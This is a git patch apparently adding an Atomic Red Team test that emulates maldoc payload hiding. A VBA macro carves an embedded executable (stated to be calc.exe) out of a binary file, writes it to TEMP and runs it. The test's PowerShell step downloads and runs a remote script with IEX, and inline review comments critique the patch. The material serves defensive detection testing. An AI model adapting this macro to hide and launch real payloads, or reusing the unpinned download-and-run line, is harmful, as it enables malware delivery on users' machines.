From 78507aedceaf80dcd340e17fe57d5ac09123e420 Mon Sep 17 00:00:00 2001
From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com>
Date: Wed, 16 Dec 2020 10:46:56 -0500
Subject: [PATCH] Extractbinary (#1332)
* initial
* moving file
* hard-code to winword process
Co-authored-by: avocado
Co-authored-by: Carrie Roberts
---
atomics/T1564/T1564.yaml | 40 ++++++++++++++++++++++
atomics/T1564/bin/extractme.bin | Bin 0 -> 33022 bytes
atomics/T1564/src/T1564-macrocode.txt | 46 ++++++++++++++++++++++++++
3 files changed, 86 insertions(+)
create mode 100644 atomics/T1564/T1564.yaml
create mode 100644 atomics/T1564/bin/extractme.bin
create mode 100644 atomics/T1564/src/T1564-macrocode.txt
diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml
new file mode 100644
index 00000000..9a59a90b
--- /dev/null
+++ b/atomics/T1564/T1564.yaml
@@ -0,0 +1,40 @@
+attack_technique: T1564
+display_name: "Hide Artifacts"
+atomic_tests:
+- name: Extract binary files via VBA
+ auto_generated_guid:
+ description: |
+ This module extracts a binary (calc.exe) from inside of another binary.
+
+ In the wild maldoc authors will use this technique to hide binaries inside of files stored
+ within the office document itself. An example of this technique can be seen in sample
+
+ f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
+
+ This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
+ is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
+ and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
+ oleObject.bin file is a payload that is parsed out and executed on the file system.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Microsoft Word must be installed
+ prereq_command: |
+ try {
+ New-Object -COMObject "Word.Application" | Out-Null
+ Stop-Process -Name "winword"
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: |
+ Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+ executor:
+ command: |
+ $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
+ $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
+ cleanup_command: |
+ Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
+ name: powershell
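Review bot: The executor line `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")` downloads and runs a script straight from a mutable branch with no pinning or hash check, so anyone able to change that file on `master` gets code execution on every host that runs this test; pin the URL to a specific commit (`.../invoke-atomicredteam/<COMMIT_SHA>/Public/Invoke-MalDoc.ps1`) or, since the path suggests the function is already part of the invoke-atomicredteam module the runner loads, call it without the download. The prereq's `Stop-Process -Name "winword"` kills every Word instance on the machine rather than the COM instance the check just created; keep the object and close it, `$w = New-Object -COMObject "Word.Application"; $w.Quit(); exit 0`. The cleanup `Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore` is likely to fail silently while the process the macro started from that file is still running, so a `Stop-Process -Name "extracted" -ErrorAction Ignore` should precede it. `auto_generated_guid:` is left empty, so the test has no stable identifier.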
diff --git a/atomics/T1564/bin/extractme.bin b/atomics/T1564/bin/extractme.bin new file mode 100644 index 0000000000000000000000000000000000000000..96610b473e10d0f61391db33b700caad5c7982a3 GIT binary patch literal 33022 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 X^!`Kl14lpS(JVT|kNM~SI}Q9lD#F_V literal 0 HcmV?d00001 diff --git a/atomics/T1564/src/T1564-macrocode.txt b/atomics/T1564/src/T1564-macrocode.txt new file mode 100644 index 00000000..98759b8a --- /dev/null +++ b/atomics/T1564/src/T1564-macrocode.txt 
@@ -0,0 +1,46 @@
+Sub Extract()
+
+ Dim peBin%
+ Dim byt As Byte
+ Dim memArray() As Variant
+
+ peBin = FreeFile
+ FName = "aREPLACEMEa"
+ outName = Environ$("TEMP") + "\extracted.exe"
+ Open FName For Binary Access Read As peBin
+
+ cnt = 0
+
+ Do While Not EOF(peBin)
+ Get peBin, , byt
+ If Hex(byt) = "4D" Then
+ ReDim Preserve memArray(cnt)
+ memArray(cnt) = Hex(byt)
+ cnt = cnt + 1
+ Get peBin, , byt
+ If Hex(byt) = "5A" Then
+ ReDim Preserve memArray(cnt)
+ memArray(cnt) = Hex(byt)
+ cnt = cnt + 1
+ Get peBin, , byt
+ Do While Not EOF(peBin)
+ ReDim Preserve memArray(cnt)
+ memArray(cnt) = Hex(byt)
+ cnt = cnt + 1
+ Get peBin, , byt
+ Loop
+ End If
+ End If
+ Loop
+
+ Close peBin
+
+ Open (outName) For Binary Lock Read Write As #1
+ For a = 0 To UBound(memArray)
+ Put #1, , CByte("&h" & memArray(a))
+ Next a
+ Close
+
+ Call Shell(outName, vbNormalFocus)
+
+End Sub
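Review bot: The outer scan stores every 0x4D byte in `memArray` before it has checked that 0x5A follows, so each lone 0x4D that precedes the embedded header becomes a stray leading byte of `extracted.exe`, and a 0x4D that directly follows another 0x4D is consumed by the inner `Get` and never re-examined; the bundled `extractme.bin` presumably happens to avoid both cases, but any other input would be corrupted. Tracking the previous byte and beginning the copy only once the `4D 5A` pair has been seen fixes both, as sketched below. If the pair is never found, `UBound(memArray)` raises 'Subscript out of range' on the never-dimensioned array after the output file has already been opened, so add `If cnt = 0 Then Exit Sub` after `Close peBin`, and take the output file number from `FreeFile` as is already done for `peBin` instead of hard-coding `#1`. Growing the array with `ReDim Preserve` on every byte and holding each byte as a hex-string Variant is quadratic; reading the whole file into a `Byte` array sized by `LOF(peBin)` with a single `Get` would be both simpler and faster, though that is a larger change than shown here.
```vba
    Dim prev As Byte
    ' … unchanged: FreeFile, FName/outName, Open … As peBin, cnt = 0 …
    Do While Not EOF(peBin)
        Get peBin, , byt
        If prev = &H4D And byt = &H5A Then
            ReDim memArray(1)
            memArray(0) = "4D"
            memArray(1) = "5A"
            cnt = 2
            Get peBin, , byt
            ' … unchanged: inner Do While Not EOF(peBin) copy loop …
        End If
        prev = byt
    Loop
```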